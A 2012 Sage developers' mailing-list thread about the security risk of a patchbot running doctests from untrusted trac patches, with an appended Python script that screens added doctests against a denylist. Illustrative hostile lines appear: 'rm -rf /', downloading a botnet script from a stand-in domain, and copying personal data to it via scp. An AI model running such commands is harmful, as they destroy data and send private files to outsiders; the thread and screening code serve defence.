On Wed, Feb 15, 2012 at 11:10 AM, Jason Grout
<[email protected]> wrote:
> On 2/15/12 12:59 PM, William Stein wrote:
>>
>> On Wed, Feb 15, 2012 at 10:31 AM, kcrisman<[email protected]>  wrote:
>>>>>
>>>>> expected behavior.
>>>>
>>>>
>>>> It does always timeout. The regular doctests take 1300 seconds for
>>>> sandpile.py! I need to figure out what's going on there.
>>>>
>>>>> I think at this point manual intervention is required. Or was there
>>>>> something else you were thinking it should do (because clearly you
>>>>> were surprised, which isn't the intent).
>>>>
>>>>
>>>> Well, I wasn't *too* surprised. I guess I was hoping for everything to
>>>> work perfectly with no intervention. But it does seem to be working now,
>>>> with a longer timeout.
>>>>
>>>
>>> Some followup (#10702 notwithstanding):
>>>
>>> So I tried out the patchbot. Seemed to work reasonably well at
>>> first.
>>>
>>> Then I came into my office this morning.  Computer was humming at a
>>> VERY decent clip; I could not get the screen to appear, Ctrl-C did
>>> nothing, nothing nothing nothing, but clearly very busy (testing,
>>> perhaps).  I had to restart it manually.
>>
>>
>> Yikes!
>>
>> I'm still worried -- what if some jerk posts a patch to trac that contains
>>
>>    sage: os.system('rm -rf /')
>>    Got you!
>>
>> I think a patch like the above is a very real possibility.  All that
>> would have to happen would be for one of the 500 trac accounts (which
>> sometimes have very dumb passwords) to be compromised, or for somebody
>> to get a trac account, and boom -- some users running a patchbot lose
>> everything.  That's not a pretty thought.
>>
>
> or
>
> sage: email('SPAM MESSAGE')
> hahaha
>
> or
>
> sage: os.system('wget ...') # download rootkit
> pwned!
>
> or
>
> sage: os.system("wget http://baddomain.com/joinbotnet.sh")
> sage: os.system("scp allyourpersonaldata.tar.gz baddomain.com")
> sage: os.system("joinbotnet.sh")
>
>
> I would definitely want this thing sandboxed as much as possible, preferably
> running on a virtual machine that is completely firewalled off from the net,
> except communication with the patch server.

A virtual machine would be really good because it will normalize
*what* compute the tests are being run on.   It's bad because of the
same reason, I guess.

But if the point of lots of people running patchbots is that we don't
have enough compute power on sage.math to do it, then using a
virtual machine seems like by far the best option.  If it is to test on
a wide variety of OS/hardware combinations, then it is a bad option.

 -- William
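
A pre-screen a patchbot operator could run before executing anything from a ticket, added here as an example (not part of the thread or of the patchbot's code): it pulls the doctest statements a patch adds and holds any that touch process, network or dynamic-execution names, or that cannot be parsed. The function names and the denylist are assumptions, and a name check like this is triage for human review, not a substitute for the isolated virtual machine discussed above.

```python
import ast
import re
# Assumed denylist for this example; "email" is taken from the thread's doctest.
RISKY = {"os", "subprocess", "socket", "shutil", "urllib", "ctypes",
         "eval", "exec", "__import__", "open", "getattr", "email"}
# An added diff line ("+", but not the "+++" file header) carrying a doctest prompt.
DOCTEST = re.compile(r"^\+(?!\+\+)\s*(?:sage:|>>>)\s?(.*)$")

def risky_reasons(statement):
    """Return the reasons one doctest statement should wait for human review."""
    try:
        tree = ast.parse(statement)
    except SyntaxError:
        # Sage-only syntax and multi-line statements do not parse; fail closed.
        return ["unparseable statement"]
    reasons = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Name):
            names = [node.id]
        elif isinstance(node, (ast.Import, ast.ImportFrom)):
            # Imported names plus the "from" module, reduced to the top-level package.
            names = [a.name for a in node.names] + [getattr(node, "module", None) or ""]
            names = [n.split(".")[0] for n in names]
        else:
            continue
        reasons += [n for n in names if n in RISKY]
    return reasons

def triage_patch(patch_text):
    """Return (line number, statement, reasons) for each added doctest to hold."""
    held = []
    for lineno, line in enumerate(patch_text.splitlines(), 1):
        match = DOCTEST.match(line)
        reasons = risky_reasons(match.group(1).strip()) if match else []
        if reasons:
            held.append((lineno, match.group(1).strip(), reasons))
    return held

# Constructed sample patch (file name is a placeholder); it is only parsed, never run.
SAMPLE_PATCH = """\
--- a/example_module.py
+++ b/example_module.py
@@ -10,1 +10,6 @@
     EXAMPLES::
+        sage: 2 + 2
+        4
+        sage: os.system('rm -rf /')
+        Got you!
+        sage: R.<x> = QQ[]
"""
HELD = triage_patch(SAMPLE_PATCH)  # holds lines 7 and 9 of the sample
```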

-- 
For more options, visit this group at http://groups.google.com/group/sage-devel
URL: http://www.sagemath.org